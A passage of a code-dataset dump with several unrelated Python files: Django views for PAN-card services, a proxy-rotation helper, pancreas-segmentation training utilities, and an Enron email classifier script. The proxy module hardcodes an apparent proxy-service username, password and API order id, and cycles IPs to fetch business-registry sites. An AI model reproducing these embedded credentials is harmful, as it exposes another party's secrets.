None:\n return HttpResponse('Account not found')\n elif service.charge > ac.balance:\n request.err = low_balance_err\n elif form.is_valid():\n AccountView().debit_money(request, service.charge)\n form.instance.tid=TransactionsView().add_record(request,service.charge)\n form.save() # saving the data\n request.msg = \"Successfully submitted!\"\n else:\n request.err = \"Something went wrong!\"\n return self.get(request)\n\n\nclass PanPdfView(LoginRequiredMixin, View):\n def get(self, request):\n form = PanPdfForm()\n service = ServiceView().get_service_by_id('PAN_PDF')\n return render(request, 'services/pan/pan_pdf.html', context={'title': 'Pdf Pan', 'form': form, 'service': service})\n\n def post(self, request):\n form = PanPdfForm(request.POST) # form data from request\n ac = AccountView().get_account(request)\n form.instance.account = ac\n service = ServiceView().get_service_by_id('PAN_PDF')\n\n if ac is None:\n return HttpResponse('Account not found')\n elif service.charge > ac.balance:\n request.err = low_balance_err\n elif form.is_valid():\n AccountView().debit_money(request, service.charge)\n form.instance.tid=TransactionsView().add_record(request,service.charge)\n form.save() # saving the data\n request.msg = \"Successfully submitted!\"\n else:\n request.err = \"Something went wrong!\"\n return self.get(request)\n\n\nclass NsdlPanFindRecordView(LoginRequiredMixin, View):\n def get(self, request):\n ac = AccountView().get_account(request)\n records = Panfind.objects.filter(account=ac)\n context = {\n 'title': 'Find Record',\n 'records': records,\n 'table_title': 'PAN Number Find Record'\n }\n return render(request, 'services/pan/pan_records.html', context=context)\n\n\nclass 
PanPdfRecordView(LoginRequiredMixin, View):\n def get(self, request):\n ac = AccountView().get_account(request)\n records = Panpdf.objects.filter(account=ac)\n context = {\n 'title': 'PDF Record',\n 'records': records,\n 'table_title': 'Pancard PDF Record'\n }\n return render(request, 'services/pan/pdf_records.html', context=context)\n \n\nclass AllpanpdfRecordView(LoginRequiredMixin, View):\n def get(self, request):\n ac = AccountView().get_account(request)\n records = Allpanpdf.objects.filter(account=ac)\n context = {\n 'title': 'All PDF Record',\n 'records': records,\n 'table_title': 'All PAN PDF Record'\n }\n return render(request, 'services/pan/uti_records.html', context=context)\n \n\nclass InstantPanRecordView(LoginRequiredMixin, View):\n def get(self, request):\n ac = AccountView().get_account(request)\n records = InstantPanfind.objects.filter(account=ac)\n context = {\n 'title': 'INSTANT PAN RECORD',\n 'records': records,\n 'table_title': 'INSTANT PAN RECORD'\n }\n return render(request, 'services/pan/instant_pan_records.html', context=context)\n","repo_name":"ofmukesh/hrservices","sub_path":"pan_service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42221851272","text":"# -*- encoding:utf8 -*-\r\nimport requests\r\nimport json\r\nimport multiprocessing\r\nimport random\r\nimport traceback\r\n\r\nimport XX.Date.DatetimeHelper as tsh\r\nimport XX.HTTP.RequestsHelper as reqh\r\nimport XX.DB.RedisHelper as RH\r\nimport redis\r\nimport requests\r\nfrom XX.Tools.Debug import *\r\n\r\n\r\n# 阿布云大代理\r\ndef getProxy(un=\"H76Z3LKO67NRN5QD\", pwd=\"272305BABB9380E1\"):\r\n # # 代理服务器------------------------------\r\n proxyHost = \"http-dyn.abuyun.com\"\r\n proxyPort = \"9020\"\r\n\r\n # 代理隧道验证信息\r\n proxyUser = un\r\n proxyPass = pwd\r\n\r\n proxyMeta = \"http://%(user)s:%(pass)s@%(host)s:%(port)s\" % {\r\n \"host\": proxyHost,\r\n \"port\": proxyPort,\r\n \"user\": proxyUser,\r\n \"pass\": proxyPass,\r\n }\r\n\r\n proxies = {\r\n \"http\": proxyMeta,\r\n \"https\": proxyMeta,\r\n }\r\n # # -----------------------------------------\r\n return proxies\r\n\r\n\r\ndef changeProxy():\r\n pass\r\n\r\n\r\ndef getTaiYangProxy(redis_host=\"127.0.0.1\", db=11):\r\n r = redis.Redis(redis_host, db=db)\r\n p = multiprocessing.Process(target=addTaiYang, args=(None,))\r\n p.daemon = True\r\n p.start()\r\n p.join()\r\n ips = r.keys()\r\n if ips:\r\n ip = random.choice(ips)\r\n proxies = {\r\n \"http\": ip,\r\n \"https\": ip,\r\n }\r\n return proxies\r\n else:\r\n print(\"No more ip in taiyang proxy(db11)\")\r\n return None\r\n\r\n\r\ndef addTaiYang(redis_host=\"127.0.0.1\", db=11):\r\n r = redis.Redis(redis_host, db=db)\r\n url = \"http://http-api.taiyangruanjian.com/getip?num=1&type=2&pro=&city=0&yys=0&port=11&pack=13604&ts=1&ys=0&cs=0&lb=1&sb=0&pb=4&mr=0®ions=\"\r\n while True:\r\n time.sleep(1)\r\n if r.dbsize() < 3:\r\n resp = reqh.RequestsHelper.RequestUrl(url)\r\n if resp.status == 200:\r\n try:\r\n json_data = json.loads(resp.text)\r\n if json_data[\"code\"] == 0:\r\n ip = str(json_data[\"data\"][0][\"ip\"]) + \":\" + str(json_data[\"data\"][0][\"port\"])\r\n ets = int(tsh.strToTs(json_data[\"data\"][0][\"expire_time\"]) - time.time() + 1)\r\n d(\"OK \" + json_data[\"data\"][0][\"expire_time\"] + \" ====== now + \" + str(ets // 60), line1=\"===\")\r\n r.set(ip, 0, ex=ets)\r\n time.sleep(1)\r\n except:\r\n print(\"not json data\" + resp.text)\r\n 
traceback.print_exc()\r\n else:\r\n print(\"proxy return error\" + str(resp.text))\r\n else:\r\n break\r\n return 1\r\n\r\n\r\ndef addMivipProxy(r_cfg, api=None):\r\n conn_redis = RH.RedisHelper.getRedisConnectByCfg(r_cfg)\r\n while 1:\r\n if conn_redis.dbsize() < 50:\r\n try:\r\n req = requests.get(api, timeout=5)\r\n if req.status_code == 200:\r\n json_data = json.loads(req.text)\r\n ips = json_data.get(\"result\")\r\n if ips:\r\n for ip in ips:\r\n conn_redis.set(ip[\"ip:port\"], 0, ip[\"time_avail\"])\r\n print(\"Add proxy\" + str(ip[\"ip:port\"]))\r\n else:\r\n print(\"No ip\" + req.text)\r\n else:\r\n print(req.status_code)\r\n except:\r\n traceback.print_exc()\r\n else:\r\n print(\"Too Much proxy\")\r\n time.sleep(10)\r\n\r\n\r\ndef getZhimaProxy(redis_host=\"127.0.0.1\", db=11):\r\n r = redis.Redis(redis_host, db=db)\r\n # p = multiprocessing.Process(target=addZhima, args=(None,))\r\n # p.daemon = True\r\n # p.start()\r\n # p.join()\r\n ips = r.keys()\r\n if ips:\r\n ip = random.choice(ips)\r\n proxies = {\r\n \"http\": ip,\r\n \"https\": ip,\r\n }\r\n return proxies\r\n else:\r\n print(\"No more ip in taiyang proxy(db11)\")\r\n return None\r\n\r\n\r\ndef addZhima(redis_host=\"127.0.0.1\", db=11):\r\n r = redis.Redis(redis_host, db=db)\r\n url = \"http://webapi.http.zhimacangku.com/getip?num=1&type=2&pro=&city=0&yys=0&port=1&pack=15624&ts=1&ys=0&cs=0&lb=1&sb=0&pb=4&mr=1®ions=\"\r\n while True:\r\n time.sleep(1)\r\n if r.dbsize() < 2:\r\n resp = reqh.RequestsHelper.RequestUrl(url)\r\n if resp.status == 200:\r\n try:\r\n json_data = json.loads(resp.text)\r\n if json_data[\"code\"] == 0:\r\n ip = str(json_data[\"data\"][0][\"ip\"]) + \":\" + str(json_data[\"data\"][0][\"port\"])\r\n ets = int(tsh.strToTs(json_data[\"data\"][0][\"expire_time\"]) - time.time() + 1)\r\n d(\"OK \" + json_data[\"data\"][0][\"expire_time\"] + \" ====== now + \" + str(ets // 60), line1=\"===\")\r\n r.set(ip, 0, ex=ets)\r\n time.sleep(1)\r\n else:\r\n print(json_data)\r\n except:\r\n print(\"not json data\" + resp.text)\r\n traceback.print_exc()\r\n else:\r\n print(\"proxy return error\" + str(resp.text))\r\n else:\r\n print(\"Enough\")\r\n time.sleep(10)\r\n\r\n\r\ndef getDB11Proxy(redis_host=\"127.0.0.1\", db=11):\r\n r = redis.Redis(redis_host, db=db)\r\n ips = r.keys()\r\n if ips:\r\n ip = random.choice(ips)\r\n proxies = {\r\n \"http\": ip,\r\n \"https\": ip,\r\n }\r\n return proxies\r\n else:\r\n print(\"No more ip in taiyang proxy(db11)\")\r\n return None\r\n\r\n\r\ndef testIP():\r\n headers = {\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\r\n \"Connection\": \"keep-alive\",\r\n \"Upgrade-Insecure-Requests\": \"1\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5005.400 QQBrowser/10.0.923.400\"\r\n }\r\n while 1:\r\n PROXIES = getZhimaProxy()\r\n if PROXIES:\r\n urls = []\r\n urls.append(\"https://www.baidu.com/?tn=98010089_dg\")\r\n urls.append(\"http://www.qichacha.com/\")\r\n urls.append(\"http://www.gsxt.gov.cn/index.html\")\r\n urls.append(\"https: // www.csdn.net /\")\r\n for url in urls:\r\n try:\r\n req = requests.get(url, proxies=PROXIES, timeout=5, headers=headers)\r\n print(req.status_code)\r\n time.sleep(1)\r\n except:\r\n print(\"time out\" + url)\r\n else:\r\n p(\" wrong proxy\", line=\"-----\")\r\n\r\n\r\ndef getProxyByIP(ip):\r\n proxies = 
{\r\n \"http\": ip,\r\n \"https\": ip,\r\n }\r\n return proxies\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import random\r\n from XX.Model.Struct.RedisConn import ali_cfg\r\n\r\n ali_cfg[\"db\"] = 9\r\n api = \"https://proxyapi.mimvp.com/api/fetchsecret.php?orderid=867050512125280583&num=50&http_type=3&result_fields=1,3&result_sort_field=2&result_format=json\"\r\n addMivipProxy(ali_cfg, api=api)\r\n exit()\r\n","repo_name":"Eddyy90/desafioAgenda","sub_path":".venv/lib/python3.8/site-packages/XX/Tools/Proxy.py","file_name":"Proxy.py","file_ext":"py","file_size_in_byte":7210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"934184584","text":"import logging\nimport random\nimport sys\nimport time\n\nimport numpy as np\nimport torch\nfrom pathlib import Path\nfrom tensorboardX import SummaryWriter\nfrom torch import nn as nn, optim as optim\nfrom torch.nn import functional as F\nfrom torch.utils.data import DataLoader\n\nfrom dataset.pancreas import Pancreas, PancreasSTDataset\nfrom resnet18_3d import AHNet\nfrom utils1 import statistic\nfrom vnet import VNet\n\n\ndef to_cuda(tensors, device=None):\n res = []\n if isinstance(tensors, (list, tuple)):\n for t in tensors:\n res.append(to_cuda(t, device))\n return res\n elif isinstance(tensors, (dict,)):\n res = {}\n for k, v in tensors.items():\n res[k] = to_cuda(v, device)\n return res\n else:\n if isinstance(tensors, torch.Tensor):\n if device is None:\n return tensors.cuda()\n else:\n return tensors.to(device)\n else:\n return tensors\n\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n return self\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val\n self.count += n\n self.avg = self.sum / self.count\n return self\n\n\ndef set_random_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n\ndef get_current_consistency_weight(current, rampup_length):\n \"\"\"Exponential rampup from https://arxiv.org/abs/1610.02242\"\"\"\n if rampup_length == 0:\n return 1.0\n else:\n current = np.clip(current, 0.0, rampup_length)\n phase = 1.0 - current / rampup_length\n return float(np.exp(-5.0 * phase * phase))\n\n\n@torch.no_grad()\ndef update_ema_variables(model, ema_model, alpha):\n for ema_param, param in zip(ema_model.parameters(), model.parameters()):\n ema_param.data.mul_(alpha).add_((1 - alpha) * param.data)\n\n\ndef create_model(res18=False, ema=False):\n net = AHNet() if res18 else VNet()\n net = nn.DataParallel(net)\n model = net.cuda()\n if ema:\n for param in model.parameters():\n param.detach_()\n return model\n\n\ndef get_model_and_dataloader(data_root, split_name, batch_size, lr, res18=False):\n print(\"Initialize network, optimizer and datasets...\")\n \"\"\"Net & optimizer\"\"\"\n net = create_model(res18)\n ema_net = create_model(res18, ema=True).cuda()\n optimizer = optim.Adam(net.parameters(), lr=lr, betas=(0.5, 0.999))\n\n trainset_lab = Pancreas(data_root, split_name, split='train_lab')\n lab_loader = DataLoader(trainset_lab, batch_size=batch_size, shuffle=False, num_workers=0)\n\n trainset_unlab = Pancreas(data_root, split_name, split='train_unlab', no_crop=True)\n unlab_loader = DataLoader(trainset_unlab, batch_size=1, shuffle=False, num_workers=0)\n\n testset = Pancreas(data_root, split_name, split='test')\n test_loader = 
DataLoader(testset, batch_size=1, shuffle=False, num_workers=0)\n return net, ema_net, optimizer, lab_loader, unlab_loader, test_loader\n\n\ndef save_net_opt(net, optimizer, path, epoch):\n state = {\n 'net': net.state_dict(),\n 'opt': optimizer.state_dict(),\n 'epoch': epoch,\n }\n torch.save(state, str(path))\n\n\ndef load_net_opt(net, optimizer, path):\n state = torch.load(str(path))\n ret = net.load_state_dict(state['net'])\n print(ret)\n optimizer.load_state_dict(state['opt'])\n\n\ndef count_param(model):\n param_count = 0\n for param in model.parameters():\n param_count += param.view(-1).size()[0]\n return param_count\n\n\ndef get_mask(out, thres=0.5):\n probs = F.softmax(out, 1)\n masks = (probs >= thres).float()\n masks = masks[:, 1, :, :].contiguous()\n return masks\n\n\n@torch.no_grad()\ndef pred_unlabel(net, pred_loader, batch_size):\n unimg, unlab, unmask, labs = [], [], [], []\n plab_dice = 0\n for (step, data) in enumerate(pred_loader):\n img, lab = data\n img, lab = img.cuda(), lab.cuda()\n out = net(img)\n plab0 = get_mask(out[0])\n plab1 = get_mask(out[1])\n plab2 = get_mask(out[2])\n\n mask = (plab1 == plab2).long()\n plab = plab0\n unimg.append(img)\n unlab.append(plab)\n unmask.append(mask)\n labs.append(lab)\n\n plab_dice += statistic.dice_ratio(plab, lab)\n plab_dice /= len(pred_loader)\n new_loader = DataLoader(PancreasSTDataset(unimg, unlab, unmask, labs), batch_size=batch_size, shuffle=True, num_workers=0, drop_last=True)\n return new_loader, plab_dice\n\n\ndef config_log(save_path, tensorboard=False):\n writer = SummaryWriter(str(save_path), filename_suffix=time.strftime('_%Y-%m-%d_%H-%M-%S')) if tensorboard else None\n\n save_path = str(Path(save_path) / 'log.txt')\n formatter = logging.Formatter('%(levelname)s [%(asctime)s] %(message)s')\n\n logger = logging.getLogger(save_path.split('/')[-2])\n logger.setLevel(logging.INFO)\n\n handler = logging.FileHandler(save_path)\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n\n sh = logging.StreamHandler(sys.stdout)\n handler.setFormatter(formatter)\n logger.addHandler(sh)\n\n return logger, writer\n\n\nclass Measures():\n def __init__(self, keys, writer, logger):\n self.keys = keys\n self.measures = {k: AverageMeter() for k in self.keys}\n self.writer = writer\n self.logger = logger\n\n def reset(self):\n [v.reset() for v in self.measures.values()]\n\n\nclass PretrainMeasures(Measures):\n def __init__(self, writer, logger):\n keys = ['loss_ce', 'loss_dice', 'loss_con', 'loss_rad', 'loss_all', 'train_dice']\n super(PretrainMeasures, self).__init__(keys, writer, logger)\n\n def update(self, out, lab, *args):\n args = list(args)\n masks = get_mask(out)\n train_dice = statistic.dice_ratio(masks, lab)\n args.append(train_dice)\n\n dict_variables = dict(zip(self.keys, args))\n for k, v in dict_variables.items():\n self.measures[k].update(v)\n\n def log(self, epoch, step):\n # self.logger.info('epoch : %d, step : %d, train_loss: %.4f, train_dice: %.4f' % (\n # epoch, step, self.measures['loss_all'].avg, self.measures['train_dice'].avg))\n\n log_string, params = 'Epoch : {}', []\n for k in self.keys:\n log_string += ', ' + k + ': {:.4f}'\n params.append(self.measures[k].val)\n self.logger.info(log_string.format(epoch, *params))\n\n for k, measure in self.measures.items():\n k = 'pretrain/' + k\n self.writer.add_scalar(k, measure.avg, step)\n self.writer.flush()\n\n\nclass STMeasures(Measures):\n def __init__(self, writer, logger):\n keys = ['train_loss', 'sup_all_loss', 'sup_ce_loss', 'sup_rad_loss', 
'sup_con_loss', 'sup_dice_loss',\n 'certain_all_loss', 'certain_ce_loss', 'certain_rad_loss', 'certain_con_loss', 'uncertain_loss',\n 'train_dice', 'unlab_dice', 'unlab_rad_dice', 'unlab_con_dice', 'lab_con_dice', 'lab_rad_dice']\n super(STMeasures, self).__init__(keys, writer, logger)\n\n @torch.no_grad()\n def update(self, out1, out2, lab1, lab2, *args):\n mask1 = get_mask(out1[0])\n mask2 = get_mask(out2[0])\n dices = [statistic.dice_ratio(mask1, lab1), statistic.dice_ratio(mask2, lab2), statistic.dice_ratio(get_mask(out1[2]), lab1),\n statistic.dice_ratio(get_mask(out2[2]), lab2), statistic.dice_ratio(get_mask(out1[1]), lab1),\n statistic.dice_ratio(get_mask(out2[1]), lab2)]\n args = list(args)\n args.extend(dices)\n dict_variables = dict(zip(self.keys, args))\n\n for k, v in dict_variables.items():\n self.measures[k].update(v)\n\n def log(self, epoch):\n log_keys = ['train_loss', 'sup_all_loss', 'certain_all_loss', 'uncertain_loss',\n 'train_dice', 'unlab_dice', 'lab_rad_dice', 'lab_con_dice', 'unlab_rad_dice', 'unlab_con_dice']\n log_string = 'Epoch : {}'\n params = []\n for k in log_keys:\n log_string += ', ' + k + ': {:.4f}'\n params.append(self.measures[k].val)\n self.logger.info(log_string.format(epoch, *params))\n\n def write_tensorboard(self, epoch):\n for k, measure in self.measures.items():\n if 'sup' in k or 'train_loss' in k:\n k = 'supervised_loss/' + k\n elif 'certain' in k:\n k = 'upsupervised_loss/' + k\n else:\n k = 'dice/' + k\n self.writer.add_scalar(k, measure.avg, epoch)\n self.writer.flush()\n","repo_name":"koncle/CoraNet","sub_path":"utils1/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8751,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"53"} +{"seq_id":"5515364769","text":"from kerasClassify import *\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.linear_model import PassiveAggressiveClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.feature_selection import SelectKBest, chi2\n\nfrom sklearn.metrics import accuracy_score, confusion_matrix\nfrom sklearn.preprocessing import label_binarize\nfrom sklearn.neighbors import KNeighborsClassifier\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\n\n# Dataset tsv file path. 
Each line is an email\ncsvEmailsFilePath = \"./data/enron_6_email_folders_KAMINSKI.tsv\"\n\n\n\ndef select_best_features(dataset, train_labels, num_best, verbose=True):\n (X_train, Y_train), (X_test, Y_test) = dataset\n if verbose:\n print('\\nSelecting %d best features\\n'%num_best)\n selector = SelectKBest(chi2, k=num_best)\n X_train = selector.fit_transform(X_train,train_labels)\n X_test = selector.transform(X_test)\n return ((X_train, Y_train), (X_test, Y_test)),selector.scores_\n\ndef plot_feature_scores(feature_names,scores,limit_to=None,save_to=None,best=True):\n plt.figure()\n if best:\n plt.title(\"Best features\")\n else:\n plt.title(\"Worst features\")\n if limit_to is None:\n limit_to = len(feature_names)\n #for some reason index 0 always wrong\n scores = np.nan_to_num(scores)\n if best:\n indices = np.argsort(scores)[-limit_to:][::-1]\n else:\n indices = np.argsort(scores)[:limit_to]\n #indices = np.argpartition(scores,-limit_to)[-limit_to:]\n plt.bar(range(limit_to), scores[indices],color=\"r\", align=\"center\")\n plt.xticks(range(limit_to),np.array(feature_names)[indices],rotation='vertical')\n plt.xlim([-1, limit_to])\n plt.ylabel('Score')\n plt.xlabel('Word')\n plt.show(block=False)\n if save_to is not None:\n plt.savefig(save_to,bbox_inches='tight')\n\ndef plot_confusion_matrix(cm, label_names, title='Confusion matrix', cmap=plt.cm.Blues, save_to = None):\n plt.figure()\n plt.imshow(cm, interpolation='nearest', cmap=cmap)\n plt.title(title)\n tick_marks = np.arange(len(label_names))\n plt.xticks(tick_marks, label_names, rotation='vertical')\n plt.yticks(tick_marks, label_names)\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n if save_to is not None:\n plt.savefig(save_to,bbox_inches='tight')\n\ndef make_plot(x,y,title=None,x_name=None,y_name=None,save_to=None,color='b',new_fig=True):\n if new_fig:\n plt.figure()\n plot = plt.plot(x,y,color)\n if title is not None:\n plt.title(title)\n if x_name is not None:\n plt.xlabel(x_name)\n if y_name is not None:\n plt.ylabel(y_name)\n if save_to is not None:\n plt.savefig(save_to,bbox_inches='tight')\n return plot\n\ndef make_plots(xs,ys,labels,title=None,x_name=None,y_name=None,y_bounds=None,save_to=None):\n colors = ('b', 'g', 'r', 'c', 'm', 'y', 'k')\n handles = []\n plt.figure()\n for i in range(len(labels)):\n plot, = make_plot(xs[i],ys[i],color=colors[i%len(colors)],new_fig=False)\n handles.append(plot)\n plt.legend(handles,labels)\n if title is not None:\n plt.title(title)\n if x_name is not None:\n plt.xlabel(x_name)\n if y_name is not None:\n plt.ylabel(y_name)\n if y_bounds is not None:\n plt.ylim(y_bounds)\n if save_to is not None:\n plt.savefig(save_to,bbox_inches='tight')\n\ndef get_baseline_dummy(dataset,train_label_list,test_label_list,verbose=True):\n (X_train, Y_train), (X_test, Y_test) = dataset\n dummy = DummyClassifier()\n dummy.fit(X_train,train_label_list)\n predictions = dummy.predict(X_test)\n accuracy = accuracy_score(test_label_list,predictions)\n \n if verbose:\n print('Got baseline of %f with dummy classifier'%accuracy)\n\n return accuracy\n\ndef get_baseline_svm(dataset,train_label_list,test_label_list,verbose=True):\n (X_train, Y_train), (X_test, Y_test) = dataset\n linear = LinearSVC(penalty='l1',dual=False)\n grid_linear = GridSearchCV(linear, {'C':[0.1, 0.5, 1, 5, 10]}, cv=5)\n grid_linear.fit(X_train,train_label_list)\n accuracy = grid_linear.score(X_test, test_label_list)\n \n if verbose:\n print('Got baseline of %f with svm 
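select_best_features above fits SelectKBest on the training split only and then applies the learned column mask to the test split, which avoids leaking test-set statistics into the selection. A small self-contained usage sketch with made-up count data (the shapes and labels are illustrative, not the Enron dataset):

import numpy as np
from sklearn.feature_selection import SelectKBest, chi2

rng = np.random.default_rng(0)
X_train = rng.integers(0, 5, size=(100, 50))  # e.g. word counts; non-negative, as chi2 requires
y_train = rng.integers(0, 2, size=100)
X_test = rng.integers(0, 5, size=(20, 50))

selector = SelectKBest(chi2, k=10)
X_train_sel = selector.fit_transform(X_train, y_train)  # fit on train only
X_test_sel = selector.transform(X_test)                 # reuse the same mask
print(X_train_sel.shape, X_test_sel.shape)              # (100, 10) (20, 10)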
classifier'%accuracy)\n\n return accuracy\n\ndef get_baseline_knn(dataset,train_label_list,test_label_list,verbose=True):\n (X_train, Y_train), (X_test, Y_test) = dataset\n knn = KNeighborsClassifier(n_neighbors=100,n_jobs=-1)\n knn.fit(X_train,train_label_list)\n predictions = np.round(knn.predict(X_test))\n accuracy = accuracy_score(test_label_list,predictions)\n\n if verbose:\n print('Got baseline of %f with linear regression '%accuracy)\n\n return accuracy\n\ndef get_baseline_pa(dataset,train_label_list,test_label_list,verbose=True):\n (X_train, Y_train), (X_test, Y_test) = dataset\n classifier = PassiveAggressiveClassifier(n_jobs=-1,fit_intercept=True)\n classifier.fit(X_train,train_label_list)\n accuracy = classifier.score(X_test,test_label_list)\n \n if verbose:\n print('Got baseline of %f with Passive Aggressive classifier'%accuracy)\n\n return accuracy\n\ndef run_once(verbose=True,test_split=0.1,ftype='binary',num_words=10000,select_best=4000,num_hidden=512,dropout=0.5, plot=True,plot_prefix='',graph_to=None,extra_layers=0): \n features,labels,feature_names,label_names = get_ngram_data(emailsFilePath=csvEmailsFilePath, num_words=num_words,matrix_type=ftype,verbose=verbose)\n num_labels = len(label_names)\n dataset,train_label_list,test_label_list = make_dataset(features,labels,num_labels,test_split=test_split)\n if select_best and select_bestmaxacc:\n maxacc = acc\n maxtype = ftype\n accs.append(acc)\n all_baselines.append(baselines)\n all_times.append(times)\n all_accs.append(accs)\n print('\\nWord count accuracies:%s\\n'%str(accs))\n make_plots(all_counts,all_accs,types,title='Test accuracy vs max words',y_name='Test accuracy',x_name='Max most frequent words',save_to='word_accs.png',y_bounds=(0,1))\n make_plots(all_counts,all_accs,types,title='Test accuracy vs max words',y_name='Test accuracy',x_name='Max most frequent words',save_to='word_accs_zoomed.png',y_bounds=(0.6,0.95))\n make_plots(all_counts,all_baselines,types,title='Baseline accuracy vs max words',y_name='Baseline accuracy',x_name='Max most frequent words',save_to='word_baseline_accs.png',y_bounds=(0,1))\n make_plots(all_counts,all_times,types,title='Time vs max words',y_name='Parse+test+train time (seconds)',x_name='Max most frequent words',save_to='word_times.png')\n print('\\nBest word accuracy %f with features %s\\n'%(maxacc,maxtype))\n\ndef test_hidden_dropout():\n #get emails once to pickle\n emails = get_emails(csvEmailsFilePath,verbose=False)\n\n dropouts = [0.25,0.5,0.75]\n all_accs = []\n all_counts = []\n all_times = []\n maxacc = 0\n maxh = 0\n for d in dropouts:\n hidden = [32,64,128,256,512,1024,2048]\n all_counts.append(hidden)\n accs=[]\n times=[]\n print('\\nTesting learning for dropout %f with hidden counts %s\\n'%(d,str(hidden)))\n for h in hidden:\n start = time.time()\n acc = sum([run_once(dropout=d,num_words=2500,num_hidden=h,plot=False,verbose=False,select_best=None)[3] for i in range(5)])/5.0\n end = time.time()\n elapsed = (end-start)/5.0\n times.append(elapsed)\n print('\\nGot acc %f for hidden count %d in %d seconds'%(acc,h,elapsed))\n if acc>maxacc:\n maxacc = acc\n maxh = h\n accs.append(acc)\n all_times.append(times)\n all_accs.append(accs)\n print('\\nWord count accuracies:%s\\n'%str(accs))\n make_plots(all_counts,all_accs,['Droupout=%f'%d for d in dropouts],title='Test accuracy vs num hidden',y_name='Test accuracy',x_name='Number of hidden units',save_to='hidden_accs.png',y_bounds=(0,1))\n make_plots(all_counts,all_accs,['Droupout=%f'%d for d in dropouts],title='Test accuracy vs num 
hidden',y_name='Test accuracy',x_name='Number of hidden units',save_to='hidden_accs_zoomed.png',y_bounds=(0.8,1))\n make_plots(all_counts,all_times,['Droupout=%f'%d for d in dropouts],title='Time vs max words',y_name='Parse+test+train time (seconds)',x_name='Number of hidden units',save_to='hidden_times.png')\n print('\\nBest word accuracy %f with hidden %d\\n'%(maxacc,maxh))\n\ndef test_select_words(num_hidden=512):\n #get emails once to pickle\n emails = get_emails(csvEmailsFilePath,verbose=False)\n\n word_counts = [2500,3500,4500,5500]\n all_accs = []\n all_counts = []\n all_times = []\n maxacc = 0\n maxs = None\n for word_count in word_counts:\n select = [0.5,0.6,0.7,0.8,0.9]\n all_counts.append(select)\n accs=[]\n times=[]\n print('\\nTesting learning for word count %d with selects %s\\n'%(word_count,str(select)))\n for s in select:\n start = time.time()\n acc = sum([run_once(num_hidden=num_hidden,dropout=0.1,num_words=word_count,plot=False,verbose=False,select_best=int(s*word_count))[3] for i in range(5)])/5.0\n end = time.time()\n elapsed = (end-start)/5.0\n times.append(elapsed)\n print('\\nGot acc %f for select ratio %f in %d seconds'%(acc,s,elapsed))\n if acc>maxacc:\n maxacc = acc\n maxs = s\n accs.append(acc)\n all_times.append(times)\n all_accs.append(accs)\n print('\\nWord count accuracies:%s\\n'%str(accs))\n make_plots(all_counts,all_accs,['Words=%d'%w for w in word_counts],title='Test accuracy vs ratio of words kept',y_name='Test accuracy',x_name='Ratio of best words kept',save_to='select_accs_%d.png'%num_hidden,y_bounds=(0,1))\n make_plots(all_counts,all_accs,['Words=%d'%w for w in word_counts],title='Test accuracy vs ratio of words kept',y_name='Test accuracy',x_name='Ratio of best words kept',save_to='select_accs_zoomed_%d.png'%num_hidden,y_bounds=(0.8,1))\n make_plots(all_counts,all_times,['Words=%d'%w for w in word_counts],title='Time vs ratio of words kept',y_name='Parse+test+train time (seconds)',x_name='Ratio of best words kept',save_to='select_times_%d.png'%num_hidden,y_bounds=(0,65))\n print('\\nBest word accuracy %f with select %f\\n'%(maxacc,maxs))\n\n\n# ------- Experiments -----------------------------\n# True to run feature extraction, selection + svm baseline (~ 0.78)\n \nrun_baseline = False\n#test_features_words()\n#test_hidden_dropout()\n#test_select_words(128)\n#test_select_words(32)\n#test_select_words(16)\n\n# TODO: try ftype = 'tfidf'\nrun_once(num_words=10000,dropout=0.5,num_hidden=512, extra_layers=0,plot=True,verbose=True,select_best=4000)\n\nif (run_baseline):\n features,labels,feature_names,label_names = get_ngram_data(emailsFilePath=csvEmailsFilePath,num_words=5000,matrix_type='tfidf',verbose=True,max_n=1)\n #features,labels,label_names = get_sequence_data()\n num_labels = len(label_names)\n dataset,train_label_list,test_label_list = make_dataset(features,labels,num_labels,test_split=0.1)\n \n # Feature selection (best 4000 features)\n dataset,scores = select_best_features(dataset,train_label_list,4000,verbose=True)\n \n # Unrem for baseline svm \n baseline = get_baseline_svm(dataset,train_label_list,test_label_list,verbose=True) \n \n # Unrem for convnet (not very good at intial tests)\n # predictions,acc = 
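Each sweep above repeats the same pattern: run the experiment several times, average the accuracy, and divide the wall-clock time by the number of runs. A small hypothetical helper capturing that pattern (timed_mean_acc is not part of the original script; run_once and its return layout are taken from above):

import time

def timed_mean_acc(run_fn, repeats=5):
    # Average run_fn()'s accuracy over `repeats` runs; report mean seconds per run.
    start = time.time()
    acc = sum(run_fn() for _ in range(repeats)) / float(repeats)
    elapsed = (time.time() - start) / float(repeats)
    return acc, elapsed

# Usage sketch, assuming run_once as defined above (index 3 is the test accuracy):
# acc, secs = timed_mean_acc(lambda: run_once(plot=False, verbose=False)[3])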
